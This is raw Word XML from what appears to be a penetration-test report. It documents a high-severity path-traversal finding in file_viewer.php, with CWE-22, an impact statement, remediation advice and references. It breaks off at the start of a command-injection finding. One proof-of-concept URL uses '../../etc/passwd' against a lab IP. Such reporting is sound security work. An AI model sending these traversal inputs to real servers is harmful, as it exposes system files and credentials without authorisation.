    <w:p w14:paraId="54ADD44C" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439" w:type="dxa"/>
        <w:tblInd w:w="-1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156202" w:rsidRPr="00D77DFE" w14:paraId="06E9EE5A" w14:textId="77777777" w:rsidTr="00094048">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0D0D78D" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="009E5B3F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>LFI / Path Traversal in file_viewer.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="752E1E72" w14:textId="77777777" w:rsidTr="00094048">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769BA07"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E127563"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156202" w:rsidRPr="00D77DFE" w14:paraId="6FF93DD0"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552E032" w14:textId="4AB6318C" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202"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VUL_03</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76F9D7A"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53472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3074787B" wp14:editId="051B42C6">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>815975</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>44450</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="869037790" name="Rectangle: Rounded Corners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chemeClr val="accent2"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:schemeClr val="accent2"/>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57ECC3E" id="Rectangle: Rounded Corners 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:64.25pt;margin-top:3.5pt;width:125.8pt;height:10.0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" fillcolor="#e97132 [3205]" strokecolor="#e97132 [3205]">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="63CAFDC2"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7C5555D"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8.6</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868B3EA" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202"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156202" w:rsidRPr="00D77DFE" w14:paraId="40E32102" w14:textId="77777777" w:rsidTr="00094048">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D75EF16" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202"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/S:C/C:H/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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A:N</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062299C" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="25A9478B"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47633AC"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156202" w:rsidRPr="00D77DFE" w14:paraId="79DF9106"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A2A7536" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202"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Browser, Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="6C498F46" w14:textId="77777777" w:rsidTr="00094048">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0CB8F6A" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202"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156202" w:rsidRPr="00D77DFE" w14:paraId="74D1E5B2" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="205"/>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D0A725B" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">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Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>include:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Application code and data. Credentials for back-end systems. Sensitive operating system files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="654E075B"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365D94C" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202"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156202" w:rsidRPr="00D77DFE" w14:paraId="7FC811E8" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="288"/>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D7D2A96" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="004602CA" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-001"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId32" w:history="1">
              <w:r w:rsidRPr="004602CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:b w:val="0"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:lang w:val="en-001"/>
                </w:rPr>
                <w:t>http://10.0.3.190:80/file_viewer.php?file=../../etc/passwd</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="45D7B859" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.0.3.190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="4C813935"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96400D8"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156202" w:rsidRPr="00D77DFE" w14:paraId="4FD43D05" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="270"/>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C65289E" w14:textId="11FD0186" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">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This vulnerability allows arbitrary local file disclosure, exposing system and application files, credentials, secrets, and source code, which can be leveraged for further attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="542C07B4"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C35B9F7"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156202" w:rsidRPr="00D77DFE" w14:paraId="0267CF89"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A50A21B" w14:textId="46A4FC81" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">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 xml:space="preserve">It is recommended to immediately restrict access to the vulnerable file‑viewer functionality, block requests containing path‑traversal patterns at the application or firewall </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>level, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> rotate any credentials or keys that may have been exposed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="5EF424E7"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39179A2" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">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156202" w:rsidRPr="00D77DFE" w14:paraId="477822BC"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054922B" w14:textId="7ED4B578" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Access file_viewer.php, supply a path‑traversal value in the file parameter, and observe that instead of restricting access to the articles directory, the application returns system files such as /etc/passwd, confirming a path‑traversal/LFI flaw (with supporting request/response evidence).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="3B3BCAEE"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6D95918" w14:textId="67E9A286" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00D44224" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof Of</w:t>
            </w:r>
            <w:r w:rsidR="00156202" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Concept:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D44224" w:rsidRPr="00D77DFE" w14:paraId="0B2A6C3C"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FE4E4CC" w14:textId="2AF8467E" w:rsidR="00D44224" w:rsidRPr="00D77DFE" w:rsidRDefault="00815CEC" w:rsidP="00815CEC">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA3" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure A.3 </w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">Path Traversal in </w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>File Viewer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="55185ECA" w14:textId="77777777" w:rsidTr="00094048">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586F2AA" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="0015620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156202" w:rsidRPr="00D77DFE" w14:paraId="727C9531" w14:textId="77777777" w:rsidTr="00094048">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15CDC4F" w14:textId="7AEE5767" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00DF3ABA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId33" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/22.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00DF3ABA" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://portswigger.net/web-security/file-path-traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FB9FE7C" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00DA48D8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9574" w:type="dxa"/>
        <w:tblInd w:w="-5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86"/>
        <w:gridCol w:w="4788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="62C765BC" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="303"/>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15BBDAD9" w14:textId="249D27E7" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1" w:rsidP="009E5B3F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Command Injection in Nslookup Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="222CFF32" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="303"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="53DB5F05" w14:textId="17473F18"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88" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="21D92354" w14:textId="7990BE82"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B571C1" w:rsidRPr="00D77DFE" w14:paraId="190DEAC7" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="349"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1696D243" w14:textId="0341A62F" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1"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w:t>
            </w:r>
            <w:r w:rsidR="00156202" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="330D1C92" w14:textId="73AB9F19"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noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C366EC9" wp14:editId="279288CC">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>893017</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>54920</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="118110"/>
                      <wp:effectExtent l="22225" t="26670" r="37465" b="45720"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1121282205"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18110"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 16667"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent2">
                                  <a:lumMod val="100000"/>
                                  <a:lumOff val="0"/>
                                </a:schemeClr>
                              </a:solidFill>
                              <a:ln w="38100">
                                <a:solidFill>
                                  <a:schemeClr val="accent2">
                                    <a:lumMod val="100000"/>
                                    <a:lumOff val="0"/>
                                  </a:schemeClr>
                                </a:solidFill>
                                <a:round/>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8D8723" id="Rectangle: Rounded Corners 9" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.3pt;margin-top:4.3pt;width:125.8pt;height:9.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" fillcolor="#e97132 [3205]" strokecolor="#e97132 [3205]" strokeweight="3pt">
                      <v:shadow on="t" color="#7f340d [1605]" opacity=".5" offset="1pt"/>
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00E3258C" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="32C5D08A" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="349"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="45F490AF" w14:textId="3B18A1ED"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w:t>
            </w:r>
            <w:r w:rsidR="00E3258C" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="525F72D9" w14:textId="77777777" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="28E16C40" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="349"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
